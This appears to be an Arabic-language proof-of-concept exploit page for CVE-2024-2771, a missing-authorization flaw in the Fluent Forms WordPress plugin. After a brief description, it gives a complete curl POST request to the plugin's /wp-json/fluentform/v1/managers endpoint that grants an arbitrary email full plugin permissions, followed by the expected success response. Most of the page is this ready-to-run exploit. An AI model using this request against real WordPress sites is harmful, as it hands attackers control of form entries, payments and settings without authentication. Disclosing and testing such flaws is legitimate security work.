
استغلال إثبات المفهوم لثغرة CVE-2024-2771، وهي ثغرة تصعيد امتيازات في إضافة Fluent Forms لووردبريس عبر نقطة نهاية REST API غير مصادق عليها.
CVE-2024-2771 إثبات المفهوم
إن إضافة Contact Form من Fluent Forms، الخاصة بالاختبارات والاستبيانات ومنشئ نماذج السحب والإفلات WP Form Builder لمنصة WordPress، معرضة لتصعيد الامتيازات بسبب عدم وجود فحص للصلاحيات على نقطة نهاية REST API /wp-json/fluentform/v1/managers في جميع الإصدارات حتى 5.1.16 وما يشملها. وهذا يتيح للمهاجمين غير المصادَق عليهم منح المستخدمين صلاحيات إدارة Fluent Form، مما يمنحهم الوصول إلى جميع إعدادات الإضافة وميزاتها. كما يتيح ذلك للمهاجمين غير المصادَق عليهم حذف حسابات المديرين.
المتطلبات الأساسية
أمر الاستغلال
# 1. Grant full Fluent Forms permissions to an arbitrary email
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/managers" \
-H "Content-Type: application/json" \
-d '{
"manager": {
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}'
الاستجابة المتوقعة
HTTP/1.1 200 OK
{
"message": "Manager has been saved.",
"manager": {
"id": 2,
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}
لقطة الشاشة
